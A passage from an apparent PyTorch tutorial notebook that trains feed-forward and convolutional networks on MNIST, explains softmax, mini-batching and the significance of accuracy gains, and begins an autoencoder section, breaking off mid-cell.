$$\frac{1}{2} \big(\frac{y_{\text{target}} - y_{\text{pred}}}{y_{\text{target}}}\big)^2$$
but this is probably much harder to optimize.
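A custom loss like this is just a function of two tensors in pytorch. Here is a sketch of the relative-error loss above; the `eps` guard is my addition to avoid dividing by zero where the target crosses zero (which is also a hint at why this loss is hard to optimize on this dataset):

```python
import torch

def relative_mse(pred, target, eps=1e-6):
    # 0.5 * mean of squared percentage error; eps guards against target = 0
    return 0.5 * (((target - pred) / (target + eps)) ** 2).mean()

pred = torch.tensor([9.0, 1.1])
target = torch.tensor([10.0, 1.0])
print(relative_mse(pred, target))  # ~0.005: both examples are 10% off
```

Since it is built from differentiable tensor ops, it can be passed directly as `criterion` to `train_model` above.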
```
y = copy.copy(y[::-1])
plt.plot(x, y)
N_inputs = 1
N_outputs = 1
N_hidden_layers = 1
N_hidden_nodes = 10
activation = nn.Sigmoid()
output_activation = None #linear output - regression targets can be any real value
net = ClassifierNet(N_inputs,
N_outputs,
N_hidden_layers,
N_hidden_nodes,
activation,
output_activation)
features = torch.tensor(x).float().reshape(len(x), 1)
target = torch.tensor(y).float().reshape(len(y), 1)
net = train_model(features, target, net, 1e-2, 2, criterion=nn.MSELoss())
pred = net(features).cpu().detach().numpy().reshape(len(features))
plt.figure(figsize=(10,10))
plt.plot(x, y)
plt.plot(x, pred)
```
As expected, now the right side of the function fits well.
```
activations = net.activation(net.layer_list[0](features))
binary_activations = nn.Threshold(0.5, 0)(activations)/activations
binary_pred = net.output_layer(binary_activations)
plt.figure(figsize=(10,10))
plt.plot(x,y, label='data')
plt.plot(x, binary_pred.cpu().detach().numpy(), label='binary')
plt.plot(x, pred, color='r', label='pred')
plt.legend()
```
### Clear Memory
At this stage, you should restart the kernel and clear the output since we don't need anything from before.
### Image Classification
One of the most successful applications of deep learning has been to computer vision. A central task of computer vision is **image classification**. This is the task of assigning exactly one of multiple labels to an image.
pytorch provides a package called **torchvision** which includes datasets, some modern neural network architectures as well as helper functions for images.
```
import torch
import torch.nn as nn
import torch.optim as optim
import matplotlib.pylab as plt
import pandas as pd
import numpy as np
from sklearn.neural_network import MLPClassifier, MLPRegressor
import copy
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
print(device)
from torchvision.datasets import MNIST
from torchvision import transforms
DOWNLOAD_PATH = "../data/MNIST"
mnist_train = MNIST(DOWNLOAD_PATH,
train=True,
download=True,
transform = transforms.Compose([transforms.ToTensor()]))
mnist_test = MNIST(DOWNLOAD_PATH,
train=False,
download=True,
transform = transforms.Compose([transforms.ToTensor()]))
```
You will most likely run into memory issues between the data and the weights/biases of your neural network. Let's instead sample a small random subset of the dataset.
```
print(mnist_train.data.shape)
print(mnist_train.targets.shape)
N_choose = 30
chosen_ids = np.random.choice(np.arange(mnist_train.data.shape[0]), N_choose, replace=False)
print(chosen_ids[0:10])
print(mnist_train.data[chosen_ids, :, :].shape)
print(mnist_train.targets[chosen_ids].shape)
mnist_train.data = mnist_train.data[chosen_ids, :, :]
mnist_train.targets = mnist_train.targets[chosen_ids]
print(mnist_test.data.shape)
print(mnist_test.targets.shape)
N_choose = 30
chosen_ids = np.random.choice(np.arange(mnist_test.data.shape[0]), N_choose, replace=False)
print(chosen_ids[0:10])
print(mnist_test.data[chosen_ids, :, :].shape)
print(mnist_test.targets[chosen_ids].shape)
mnist_test.data = mnist_test.data[chosen_ids, :, :]
mnist_test.targets = mnist_test.targets[chosen_ids]
```
MNIST is one of the classic image datasets and consists of 28 x 28 pixel images of handwritten digits. We downloaded both the train and test sets. Transforms defined under transform will be applied to each example. In this example, we want tensors and not images, which is what ToTensor does.
The train set consists of 60000 images.
```
mnist_train.data.shape
mnist_train.data[0]
plt.imshow(mnist_train.data[0])
```
There are 10 unique labels - 0 through 9
```
mnist_train.targets[0:10]
```
The labels are roughly equally/uniformly distributed
```
np.unique(mnist_train.targets, return_counts=True)
```
The test set consists of 10000 images.
```
mnist_test.data.shape
plt.imshow(mnist_test.data[10])
```
Same labels
```
mnist_test.targets[0:10]
```
Pretty equally distributed.
```
np.unique(mnist_test.targets, return_counts=True)
```
**Image Classifier**:
We first have to pick an architecture. The first one we'll pick is a feed-forward neural network like the one we used in the exercises above. This time I am going to use a higher abstraction to define the network.
```
#convert 28x28 image -> 784-dimensional flattened vector
class Flatten(nn.Module):
    def __init__(self):
        super(Flatten, self).__init__()
    def forward(self, inp):
        return inp.flatten(start_dim=1, end_dim=2)
Flatten()(mnist_train.data[0:10]).shape
```
Architecture definition using nn.Sequential. You can just list the layers in a sequence. We carry out the following steps:
* Flatten each image into a 784 dimensional vector
* Map the image to a 100-dimensional vector using a linear layer
* Apply a relu non-linearity
* Map the 100-dimensional vector into a 10-dimensional output layer since we have 10 possible targets.
* Apply a softmax activation to convert the 10 numbers into a probability distribution that assigns the probability the image belonging to each class (0 through 9)
A softmax activation takes N numbers $a_1, \ldots, a_N$ and converts them to a probability distribution. The first step is to ensure the numbers are positive (since probabilities cannot be negative). This is done by exponentiation.
$$a_i \rightarrow e^{a_i}$$
The next step is to normalize the numbers i.e. ensure they add up to 1. This is very straightforward. We just divide each score by the sum of scores:
$$p_i = \frac{e^{a_i}}{e^{a_1} + e^{a_2} + \ldots + e^{a_N}}$$
This is the softmax function. If you have done statistical physics (physics of systems with very large number of interacting constituents), you probably have seen the Boltzmann distribution:
$$p_i = \frac{e^{-\beta E_i}}{e^{-\beta E_1} + e^{-\beta E_2} + \ldots + e^{-\beta E_N}}$$
which gives the probability that a system with $N$ energy levels is in state $i$ with energy $E_i$ when it is in equilibrium with a thermal bath at temperature $T = \frac{1}{k_B\beta}$. This is the only probability distribution that is invariant under constant shifts in energy: $E_i \rightarrow E_i + \Delta$.
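As a quick sanity check on the formulas above, here is a minimal NumPy softmax (our own helper, not part of the notebook's code). Like the Boltzmann distribution, it is invariant under a constant shift of all the scores:

```python
import numpy as np

def softmax(a):
    # subtract the max before exponentiating for numerical stability;
    # this shift does not change the result
    e = np.exp(a - np.max(a))
    return e / e.sum()

scores = np.array([2.0, 1.0, -1.0])
probs = softmax(scores)
print(probs)                                    # three positive numbers
print(probs.sum())                              # 1.0
print(np.allclose(probs, softmax(scores + 5)))  # True: shift invariance
```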
Network definition
```
image_ff_net = nn.Sequential(Flatten(),
nn.Linear(784, 100),
nn.ReLU(),
nn.Linear(100, 10),
nn.Softmax(dim=1) #convert 10-dim activation to probability distribution
)
```
Let's ensure the data flows through our neural network and check the dimensions. As before, the neural net object is a python callable.
```
image_ff_net(mnist_train.data[0:12].float()).shape
```
We get a 10-dimensional output as expected.
**Question**: Check that the outputs for each image are actually a probability distribution (the numbers add up to 1).
```
image_ff_net(mnist_train.data[0:10].float()).sum(dim=1)
```
**Question**: We have an architecture for our neural network but we now need to decide what loss to pick. Unlike the classification problem earlier which had two classes, we have 10 classes here. Take a look at the pytorch documentation - what loss do you think we should pick to model this problem?
We used cross-entropy loss on days 2 and 3. We need the same loss here. Pytorch provides NLLLoss (negative log likelihood) as well as CrossEntropyLoss.
**Question**: Look at the documentation for both of these loss functions. Which one should we pick? Do we need to make any modifications to our architecture?
We will use the Cross-entropy Loss which can work with the raw scores (without a softmax layer).
```
image_ff_net = nn.Sequential(Flatten(),
nn.Linear(784, 100),
nn.ReLU(),
nn.Linear(100, 10),
)
```
Now we'll get raw unnormalized scores that were used to compute the probabilities. We should use nn.CrossEntropyLoss in this case.
```
image_ff_net(mnist_train.data[0:12].float())
loss = nn.CrossEntropyLoss()
```
**Training**: We have an architecture, the data, an appropriate loss. Now we need to loop over the images, use the loss to compare the predictions to the targets, compute the gradients and update the weights.
In our previous examples, we had N_epoch passes over our dataset and each time, we computed predictions for the full dataset. This is impractical as datasets get larger. Instead, we need to split the data into **batches** of a fixed size, and compute the loss, the gradients and the weight updates for each batch.
pytorch provides a DataLoader class that makes it easy to generate batches from your dataset.
**Optional**:
Let's analyze how using batches can be different from using the full dataset. Suppose our data has 10,000 rows but we use batches of size 100 (usually we pick powers of 2 for the GPU but this is just an example). Statistically, our goal is always to compute the gradient:
$$\frac{\partial L}{\partial w_i}$$
for all the weights $w_i$. By weights here, I mean both the weights and biases and any other free or tunable parameters in our model.
In practice, the loss is an average over all the examples in our dataset:
$$L = \frac{1}{N}\sum_{n=1}^N l(p_n, t_n)$$
where $p_n$ = prediction for the $n$th example, $t_n$ = target/label for the $n$th example. So the derivative is:
$$\frac{\partial L}{\partial w_i} = \frac{1}{N}\sum_{n=1}^N \frac{\partial l(p_n, t_n)}{\partial w_i} $$
In other words, our goal is to calculate this quantity but $N$ is too large. So we pick a randomly chosen subset of size 100 and only average the gradients over those examples. As an analogy, if our task was to measure the average height of all the people in the world which is impractical, we would pick randomly chosen subsets, say of 10,000 people and measure their average heights.
Of course, as we make the subset smaller, the estimate we get will be noisier i.e. it has a greater chance of higher deviation from the actual value (height or gradient). Is this good or bad? It depends. In our case, we are optimizing a function (the loss) that has multiple local minima and saddle points. It is easy to get stuck in regions of the loss space/surface. Having noisy gradients can help with escaping those local minima just because we'll not always be moving in the direction of the true gradient but a noisy estimate.
Some commonly used terminology in case you read papers/articles:
* (Full) Gradient Descent - compute the gradients over the full dataset. Memory-intensive for larger datasets. This is what we did with our toy examples above.
* Mini-batch Gradient Descent - use randomly chosen samples of fixed size as your data. Noisier gradients, more frequent updates to your model, memory efficient.
* Stochastic Gradient Descent - Mini-batch gradient descent with batch size = 1. Very noisy estimate, "online" updates to your model, can be hard to converge.
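The trade-off above can be seen numerically. The sketch below (a toy least-squares problem of our own making, not the MNIST model) compares the full-dataset gradient with mini-batch estimates: the mini-batch estimates average out to the full gradient, but each individual estimate has a nonzero spread:

```python
import numpy as np

rng = np.random.default_rng(0)
x = rng.normal(size=10_000)
t = 3.0 * x + rng.normal(scale=0.5, size=10_000)  # targets: slope 3 plus noise

def grad(w, idx):
    # d/dw of the mean squared error (1/n) * sum (w*x - t)^2 over the rows in idx
    return np.mean(2 * (w * x[idx] - t[idx]) * x[idx])

w = 0.0
full = grad(w, np.arange(len(x)))                        # full gradient descent
mini = [grad(w, rng.choice(len(x), 100, replace=False))  # mini-batches of 100
        for _ in range(1000)]
print(full)           # the "true" gradient on this dataset
print(np.mean(mini))  # close to the full gradient: the estimate is unbiased
print(np.std(mini))   # but any single mini-batch estimate is noisy
```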
There are some fascinating papers on more theoretical investigations into the loss surface and the behavior of gradient descent. Here are some examples:
* https://papers.nips.cc/paper/7875-visualizing-the-loss-landscape-of-neural-nets.pdf
* https://arxiv.org/abs/1811.03804
* https://arxiv.org/pdf/1904.06963.pdf
**End of optional section**
```
BATCH_SIZE = 16 #number of examples to compute gradients over (a batch)
#python convenience classes to sample and create batches
train_dataloader = torch.utils.data.DataLoader(mnist_train,
batch_size=BATCH_SIZE,
shuffle=True, #shuffle data
num_workers=8,
pin_memory=True
)
test_dataloader = torch.utils.data.DataLoader(mnist_test,
batch_size=BATCH_SIZE,
shuffle=True, #shuffle data
num_workers=8,
pin_memory=True
)
idx, (data_example, target_example) = next(enumerate(train_dataloader))
print(idx)
print(data_example.shape)
print(target_example.shape)
```
So we have batch 0 with 16 tensors of shape (1, 28, 28) and 16 targets. Let's ensure our network can forward propagate on this batch.
```
#image_ff_net(data_example)
```
**Question**: Debug this error
The first shape, 448 x 28, gives us a clue. We want the two 28-sized dimensions to be flattened, but the wrong dimensions are being flattened here: the dataloader output has shape [16, 1, 28, 28] (an extra channel dimension), so flattening dims 1 through 2 merges the channel with only the first image dimension, and the matrix multiply then sees 448 = 16 * 28 rows of only 28 features each.
We need to rewrite our flatten layer.
```
#convert 28x28 image -> 784-dimensional flattened vector
class Flatten(nn.Module):
def __init__(self):
super(Flatten, self).__init__()
def forward(self, inp):
return inp.flatten(start_dim=1, end_dim=-1)
Flatten()(data_example).shape
image_ff_net = nn.Sequential(Flatten(),
nn.Linear(784, 100),
nn.ReLU(),
nn.Linear(100, 10),
)
image_ff_net(data_example).shape
```
Let's combine all the elements together now and write our training loop.
```
#convert 28x28 image -> 784-dimensional flattened vector
class Flatten(nn.Module):
def __init__(self):
super(Flatten, self).__init__()
def forward(self, inp):
return inp.flatten(start_dim=1, end_dim=-1)
#ARCHITECTURE
image_ff_net = nn.Sequential(Flatten(),
nn.Linear(784, 100),
nn.ReLU(),
nn.Linear(100, 10),
)
#LOSS CRITERION and OPTIMIZER
criterion = nn.CrossEntropyLoss()
optimizer = optim.Adam(image_ff_net.parameters(), lr=1e-2)
#DATALOADERS
BATCH_SIZE = 16
train_dataloader = torch.utils.data.DataLoader(mnist_train,
batch_size=BATCH_SIZE,
shuffle=True, #shuffle data
num_workers=8,
pin_memory=True
)
test_dataloader = torch.utils.data.DataLoader(mnist_test,
batch_size=BATCH_SIZE,
shuffle=True, #shuffle data
num_workers=8,
pin_memory=True
)
image_ff_net.train() #don't worry about this (for this notebook)
image_ff_net.to(device)
N_EPOCHS = 20
for epoch in range(N_EPOCHS):
loss_list = []
for idx, (data_example, data_target) in enumerate(train_dataloader):
data_example = data_example.to(device)
data_target = data_target.to(device)
pred = image_ff_net(data_example)
loss = criterion(pred, data_target)
optimizer.zero_grad()
loss.backward()
optimizer.step()
loss_list.append(loss.item())
if epoch % 5 == 0:
print(f'Epoch = {epoch} Loss = {np.mean(loss_list)}')
```
**Question**: Use your trained network to compute the accuracy on both the train and test sets.
```
image_ff_net = image_ff_net.eval() #don't worry about this (for this notebook)
```
We'll use argmax to extract the label with the highest probability (equivalently, the highest raw score, since softmax is monotonic).
```
image_ff_net(data_example).argmax(dim=1)
train_pred, train_targets = torch.tensor([]), torch.tensor([])
with torch.no_grad(): #context manager for inference since we don't need the memory footprint of gradients
for idx, (data_example, data_target) in enumerate(train_dataloader):
data_example = data_example.to(device)
#make predictions
label_pred = image_ff_net(data_example).argmax(dim=1).float()
#concat and store both predictions and targets
label_pred = label_pred.to('cpu')
train_pred = torch.cat((train_pred, label_pred))
train_targets = torch.cat((train_targets, data_target.float()))
train_pred[0:10]
train_targets[0:10]
torch.sum(train_pred == train_targets).item() / train_pred.shape[0]
train_pred.shape[0]
assert(train_pred.shape == train_targets.shape)
train_accuracy = torch.sum(train_pred == train_targets).item() / train_pred.shape[0]
print(f'Train Accuracy = {train_accuracy:.4f}')
```
Here, I want to make an elementary remark about significant figures. When interpreting numbers like accuracy, it is important to realize how big your dataset is and what impact flipping a single example from a wrong prediction to a right one would have.
In our case, the train set has 60,000 examples. Suppose we were to flip one incorrectly predicted example to a correct one (by changing the model, retraining, etc.). This would change our accuracy, all other examples being the same, by
$$\frac{1}{60{,}000} \approx 1.67 \times 10^{-5}$$
Any digits in the accuracy beyond the fifth decimal place have no meaning! For our test set, we have 10,000 examples, so we should care about at most the fourth decimal place (and since 10,000 is a power of 10, we will never have more anyway).
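In code, the granularity argument is just:

```python
# smallest possible accuracy change: flipping a single prediction
n_train, n_test = 60_000, 10_000
print(1 / n_train)  # ~1.67e-05: digits beyond the 5th decimal place are meaningless
print(1 / n_test)   # 0.0001:    report test accuracy to at most 4 decimal places
```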
```
test_pred, test_targets = torch.tensor([]), torch.tensor([])
with torch.no_grad(): #context manager for inference since we don't need the memory footprint of gradients
for idx, (data_example, data_target) in enumerate(test_dataloader):
data_example = data_example.to(device)
#make predictions
label_pred = image_ff_net(data_example).argmax(dim=1).float()
#concat and store both predictions and targets
label_pred = label_pred.to('cpu')
test_pred = torch.cat((test_pred, label_pred))
test_targets = torch.cat((test_targets, data_target.float()))
assert(test_pred.shape == test_targets.shape)
test_accuracy = torch.sum(test_pred == test_targets).item() / test_pred.shape[0]
print(f'Test Accuracy = {test_accuracy:.4f}')
```
Great! So our simple neural network already does a great job on this task. At this stage, we would do several things:
* Look at the examples being classified incorrectly. Are these bad data examples? Would a person also have trouble classifying them?
* Test stability - what happens if we rotate images? Translate them? Flip symmetric digits? What happens if we add some random noise to the pixel values?
While we might add these to future iterations of this notebook, let's move on to some other architectural choices. One of the issues with flattening the input image is that of **locality**. Images have a notion of locality. If a pixel contains part of an object, its neighboring pixels are very likely to contain the same object. But when we flatten an image, we use all the pixels to map to each hidden node in the next layer. If we could impose locality by changing our layers, we might get much better performance.
In addition, we would like image classification to be invariant to certain transformations like translation (moving the digit up/down, left/right), scaling (zooming in and out without cropping the image), and rotation (at least up to some angle). Can we impose any of these by our choice of layers?
The answer is yes! Convolutional layers are layers designed specifically to capture such locality and preserve translational invariance. There is a lot of material available describing what these are and we won't repeat it here. Instead, we'll repeat the training procedure above but with convolutional layers.
FUTURE TODO: Add analysis of incorrectly predicted examples
FUTURE TODO: add a notebook for image filters, convolutions etc.
Let's try a convolutional layer:
nn.Conv2d
which takes in the number of input channels (1, since the images are grayscale), the number of output channels (we'll choose 20), and the kernel size (3x3). Let's run the transformation on some images.
```
idx, (data_example, target_example) = next(enumerate(train_dataloader))
print(data_example.shape)
print(nn.Conv2d(1, 20, 3)(data_example).shape)
```
**Question**: If you do know what convolutions are and how filters work, justify these shapes.
The first dimension is the batch size which remains unchanged, as expected. In the raw data, the second dimension is the number of channels i.e. grayscale only and the last two dimensions are the size of the image - 28x28.
We choose 20 output channels, which explains the output's second dimension. Each filter is 3x3 and, since we have no padding, it can only be placed at 26 positions in each dimension.
If we label the pixels along the columns as 1, 2, ..., 28, the patch can cover pixels 1-3 (inclusive of both end-points), 2-4, ..., 26-28. After that, the patch "falls off" the image unless we apply some padding. This explains the dimension 26 in both directions.
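The counting argument above generalizes to the standard output-size formula for one spatial dimension, out = (W - K + 2P) / S + 1, for input width W, kernel size K, padding P and stride S. A small helper (our own, just for checking shapes) makes this concrete:

```python
def conv_out_size(w, kernel, padding=0, stride=1):
    # number of valid positions for the kernel along one spatial dimension
    return (w - kernel + 2 * padding) // stride + 1

print(conv_out_size(28, 3))             # 26: matches the Conv2d shape above
print(conv_out_size(28, 3, padding=1))  # 28: padding of 1 preserves the size
print(conv_out_size(26, 2, stride=2))   # 13: what MaxPool2d(kernel_size=2) does next
```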
We can then apply a ReLU activation to all these activations.
```
(nn.ReLU()((nn.Conv2d(1, 20, 3)(data_example)))).shape
```
We should also apply some kind of pooling or averaging now. This reduces noise by picking disjoint, consecutive patches on the image and replacing them by some aggregate statistic like max or mean.
```
(nn.MaxPool2d(kernel_size=2)(nn.ReLU()((nn.Conv2d(1, 20, 3)(data_example))))).shape
```
**A couple of notes**:
* Pytorch's functions like nn.ReLU() and nn.MaxPool2d() return functions that can apply operations. So, nn.MaxPool2d(kernel_size=2) returns a function that is then applied to the argument above.
* Chaining together the layers and activations and testing them out like above is very valuable as the first step in ensuring your network does what you want it to do.
In general, we would suggest the following steps when you are expressing a new network architecture:
* Build up your network using nn.Sequential if you are just assembling existing or user-defined layers, or by defining a new network class inheriting from nn.Module where you can define a custom forward function.
* Pick a small tensor containing your features and pass it through each step/layer. Ensure the dimensions of the input and output tensors to each layer make sense.
* Pick your loss and optimizer and train on a small batch. You should be able to overfit i.e. get almost zero loss on this small set. Neural networks are extremely flexible learners and if you can't overfit on a small batch, you either have a bug or need to add some more capacity (more nodes, more layers etc. -> more weights).
* Now you should train on the full train set and practice the usual cross-validation practices.
* Probe your model: add noise to the inputs, see where the model isn't performing well, make partial dependency plots etc. to understand characteristics of your model. This part can be very open-ended and it depends on what your final aim is. If you are building a model to predict the stock price so you can trade, you'll spend a lot of time in this step. If you are having fun predicting dogs vs cats, maybe you don't care so much. If your aim is to dive deeper into deep learning, looking at the weights, activations, effect of changing hyperparameters, removing edges/weights etc. are very valuable experiments.
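The "overfit a small batch" check from the list above can be sketched as follows. This uses a tiny synthetic batch so it is self-contained; with real data you would take one batch from the dataloader instead:

```python
import torch
import torch.nn as nn
import torch.optim as optim

torch.manual_seed(0)
x = torch.randn(8, 784)           # one tiny batch of fake flattened "images"
y = torch.randint(0, 10, (8,))    # fake labels

net = nn.Sequential(nn.Linear(784, 100), nn.ReLU(), nn.Linear(100, 10))
opt = optim.Adam(net.parameters(), lr=1e-3)
loss_fn = nn.CrossEntropyLoss()

for step in range(500):           # train repeatedly on the same batch
    loss = loss_fn(net(x), y)
    opt.zero_grad()
    loss.backward()
    opt.step()

print(loss.item())  # should be near zero; if not, suspect a bug or too little capacity
```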
So we have seen one iteration of applying a convolutional layer followed by a non-linearity and then a max pooling layer. We can add more and more of these elements. As you can see, at each step the number of channels increases but the size of the images decreases because of the convolutions and max pooling.
**Question**: Feed a small batch through two sequences of Conv -> Relu -> Max pool. What is the output size now?
```
print(data_example.shape)
#1 channel in, 16 channels out
out1 = nn.MaxPool2d(kernel_size=2)(nn.ReLU()((nn.Conv2d(1, 16, 3)(data_example))))
print(out1.shape)
#16 channels in, 32 channels out
out2 = nn.MaxPool2d(kernel_size=2)(nn.ReLU()((nn.Conv2d(16, 32, 3)(out1))))
print(out2.shape)
#32 channels in, 128 channels out
out3 = nn.MaxPool2d(kernel_size=2)(nn.ReLU()((nn.Conv2d(32, 128, 3)(out2))))
print(out3.shape)
```
Recall that we want the output layer to have 10 outputs. We can add a linear/dense layer to do that.
```
#nn.Linear(128, 10)(out3)
```
**Question**: Debug and fix this error. Hint: look at dimensions.
```
nn.Linear(128, 10)(Flatten()(out3)).shape
```
It's time to put all these elements together.
```
#ARCHITECTURE
image_conv_net = nn.Sequential(nn.Conv2d(1, 16, 3),
nn.ReLU(),
nn.MaxPool2d(kernel_size=2),
nn.Conv2d(16, 64, 3),
nn.ReLU(),
nn.MaxPool2d(kernel_size=2),
nn.Conv2d(64, 128, 3),
nn.ReLU(),
nn.MaxPool2d(kernel_size=2),
Flatten(),
nn.Linear(128, 10)
)
#LOSS CRITERION and OPTIMIZER
criterion = nn.CrossEntropyLoss() #ensure no softmax in the last layer above
optimizer = optim.Adam(image_conv_net.parameters(), lr=1e-2)
#DATALOADERS
BATCH_SIZE = 16
train_dataloader = torch.utils.data.DataLoader(mnist_train,
batch_size=BATCH_SIZE,
shuffle=True, #shuffle data
num_workers=8,
pin_memory=True
)
test_dataloader = torch.utils.data.DataLoader(mnist_test,
batch_size=BATCH_SIZE,
shuffle=True, #shuffle data
num_workers=8,
pin_memory=True
)
```
Train the model. Ideally, write a function so we don't have to repeat this cell again.
```
def train_image_model(model, train_dataloader, loss_criterion, optimizer, N_epochs = 20):
model.train() #don't worry about this (for this notebook)
model.to(device)
for epoch in range(N_epochs):
loss_list = []
for idx, (data_example, data_target) in enumerate(train_dataloader):
data_example = data_example.to(device)
data_target = data_target.to(device)
pred = model(data_example)
loss = loss_criterion(pred, data_target)
optimizer.zero_grad()
loss.backward()
optimizer.step()
loss_list.append(loss.item())
if epoch % 5 == 0:
print(f'Epoch = {epoch} Loss = {np.mean(loss_list)}')
return model
image_conv_net = train_image_model(image_conv_net,
train_dataloader,
criterion,
optimizer)
```
Let's also add a function to do inference and compute accuracy
```
def predict_image_model(model, dataloader):
pred, targets = torch.tensor([]), torch.tensor([])
with torch.no_grad(): #context manager for inference since we don't need the memory footprint of gradients
for idx, (data_example, data_target) in enumerate(dataloader):
data_example = data_example.to(device)
#make predictions
label_pred = model(data_example).argmax(dim=1).float()
#concat and store both predictions and targets
label_pred = label_pred.to('cpu')
pred = torch.cat((pred, label_pred))
targets = torch.cat((targets, data_target.float()))
return pred, targets
train_pred, train_targets = predict_image_model(image_conv_net, train_dataloader)
test_pred, test_targets = predict_image_model(image_conv_net, test_dataloader)
assert(train_pred.shape == train_targets.shape)
train_accuracy = torch.sum(train_pred == train_targets).item() / train_pred.shape[0]
print(f'Train Accuracy = {train_accuracy:.4f}')
assert(test_pred.shape == test_targets.shape)
test_accuracy = torch.sum(test_pred == test_targets).item() / test_pred.shape[0]
print(f'Test Accuracy = {test_accuracy:.4f}')
```
In my case, the test accuracy went from 97.28% to 98.40%. You might see different numbers due to random initialization of weights and different stochastic batches. Is this significant?
**Note**: If you chose a small sample of the data, a convolutional neural net might actually do worse than the feed-forward network.
**Question**: Do you think the increase in accuracy is significant? Justify your answer.
We have 10,000 examples in the test set. With the feed-forward network, we predicted 9728 examples correctly and with the convolutional net, we predicted 9840 correctly.
We can treat the number of correct predictions as binomially distributed. Recall that the binomial distribution describes the number of heads one gets when a coin with probability $p$ of giving heads and $1-p$ of giving tails is tossed $N$ times. More formally, the average number of heads will be:
$$Np$$
and the standard deviation is:
$$\sqrt{Np(1-p)}$$
We'll do a rough back-of-the-envelope calculation. Suppose the true $p$ is what our feed-forward network gave us i.e. $p = 0.9728$ and $N = 10,000$.
Then, the standard deviation is:
$$\sqrt{10000 \times 0.9728 \times (1-0.9728)} \approx 16$$
So, to go from 9728 to 9840 correct predictions, we would need roughly 7 standard deviations, which is very unlikely to happen by chance. This strongly suggests that the convolutional neural net does give us a significant boost in accuracy, as we expected.
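The back-of-the-envelope calculation above, done in code:

```python
import math

n = 10_000                   # test set size
p = 0.9728                   # accuracy of the feed-forward baseline
sigma = math.sqrt(n * p * (1 - p))
z = (9840 - 9728) / sigma    # how many standard deviations the conv net moved us
print(sigma)  # about 16.3
print(z)      # about 6.9
```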
You can get a sense of the state-of-the-art on MNIST here: http://yann.lecun.com/exdb/mnist/
Note: MNIST is generally considered a "solved" dataset, i.e. it has not been a challenging benchmark for image classification models for several years now. You can check out more datasets (CIFAR, ImageNet, Kannada-MNIST, Fashion-MNIST, etc.) in torchvision.datasets.
**A note about preprocessing**: Image pixels take values between 0 and 255 (inclusive). In the MNIST data here, all the values are scaled down to be between 0 and 1 by dividing by 255. Often it is helpful to also subtract the mean for each pixel to help gradient descent converge faster. As an **exercise**, it is highly encouraged to re-train both the feed-forward and convolutional networks with zero-mean images.
Ensure that the means are computed only on the train set and applied to the test set.
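A minimal sketch of that preprocessing step, using random stand-in tensors (the real ones would be mnist_train.data and mnist_test.data): the per-pixel mean is computed on the train set only and reused on the test set.

```python
import torch

torch.manual_seed(0)
train = torch.rand(100, 28, 28)    # stand-in for the train images
test = torch.rand(20, 28, 28)      # stand-in for the test images

pixel_mean = train.mean(dim=0)     # one mean per pixel, from the train set only
train_centered = train - pixel_mean
test_centered = test - pixel_mean  # apply the *train* statistics to the test set

print(train_centered.mean().abs().item())  # ~0 by construction
print(test_centered.mean().abs().item())   # small, but not exactly zero
```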
#### Autoencoders
We have come a long way but there's still a lot more to do and see. While we have a lot of labelled data, the vast majority of data is unlabelled. There can be various reasons for this. It might be hard to find experts who can label the data or it is very expensive to do so. So another question is whether we can learn something about a dataset without labels. This is a very broad and difficult field called **unsupervised learning** but we can explore it a bit.
Suppose we had the MNIST images but no labels. We can no longer build a classification model with it. But we would still like to see if there are broad categories or groups or clusters within the data. Now, we didn't cover techniques like K-means clustering this week but they are definitely an option here. Since this is a class on deep learning, we want to use neural networks.
One option is to use networks called **autoencoders**. Since we can't use the labels, we'll instead predict the image itself! In other words, the network takes an image as an input and tries to predict it again. This is the identity mapping:
$$i(x) = x$$
The trick is to force the network to compress the input. In other words, if we have 784 pixels in the input (and the output), we want the hidden layers to use far less than 784 values. Let's try this.
**Note**: I am being sloppy here by pasting the same training code several times. Ideally, I would abstract away the training and inference pieces in functions inside a module.
```
#convert 28x28 image -> 784-dimensional flattened vector
#redefining for convenience
class Flatten(nn.Module):
def __init__(self):
super(Flatten, self).__init__()
def forward(self, inp):
return inp.flatten(start_dim=1, end_dim=-1)
class AE(nn.Module):
def __init__(self, N_input, N_hidden_nodes):
super(AE, self).__init__()
self.net = nn.Sequential(Flatten(),
nn.Linear(N_input, N_hidden_nodes),
nn.ReLU(),
nn.Linear(N_hidden_nodes, N_input),
nn.Sigmoid()
)
def forward(self, inp):
out = self.net(inp)
out = out.view(-1, 28, 28).unsqueeze(1) #return [BATCH_SIZE, 1, 28, 28]
return out
image_ff_ae = AE(784, 50) #we are choosing 50 hidden activations
_, (data_example, _) = next(enumerate(train_dataloader))
print(data_example.shape)
print(image_ff_ae(data_example).shape)
criterion = nn.MSELoss()
optimizer = optim.Adam(image_ff_ae.parameters(), lr=1e-2)
criterion(image_ff_ae(data_example), data_example)
def train_image_ae(model, train_dataloader, loss_criterion, optimizer, N_epochs = 20):
model.train() #don't worry about this (for this notebook)
model.to(device)
for epoch in range(N_epochs):
loss_list = []
for idx, (data_example, _) in enumerate(train_dataloader):
#Note we don't need the targets/labels here anymore!
data_example = data_example.to(device)
pred = model(data_example)
loss = loss_criterion(pred, data_example)
optimizer.zero_grad()
loss.backward()
optimizer.step()
loss_list.append(loss.item())
if epoch % 5 == 0:
print(f'Epoch = {epoch} Loss = {np.mean(loss_list)}')
return model
image_ff_ae = train_image_ae(image_ff_ae, train_dataloader, criterion, optimizer, N_epochs=20)
```
Let's look at a few examples of outputs of our autoencoder.
```
image_ff_ae.to('cpu')
output_ae = image_ff_ae(data_example)
idx = 15 #change this to see different examples
plt.figure()
plt.imshow(data_example[idx][0].detach().numpy())
plt.figure()
plt.imshow(output_ae[idx][0].detach().numpy())
```
So, great - we have a neural network that can predict the input from the input. Is this useful? Recall that we had an intermediate layer that had 50 activations. Feel free to change this number around and see what happens.
We are compressing 784 pixel values into 50 activations and then reconstructing the image from those 50 values. In other words, we are forcing the neural network to capture only relevant non-linear features that can help it remember what image the input was.
The compression is not perfect as you can see in the reconstructed image above but it's pretty good. Training for more time or better training methods might improve this.
So how exactly is this useful? A couple of possibilities:
* Lossy compression: imagine storing the 50 activations instead of each image, along with the last layers (the "decoder") that reconstruct the image from those 50 activations.
* For search: suppose we wanted to search for a target image in a database of N images. We could do N pixel-by-pixel matches but these won't work because even a slight change in position or orientation or pixel intensities will give misleading distances between images. But if we use the vector of intermediate (50, in this case) activations, then maybe we can do a search in the space of activations. Let's try that.
```
#full mnist data
print(mnist_train.data.float().shape)
```
Generally it's a good idea to split the forward function into separate encoder and decoder functions. Here we will instead index into the layers of `net` directly.
```
image_ff_ae.net
```
Compute the activations after the hidden relu
```
with torch.no_grad():
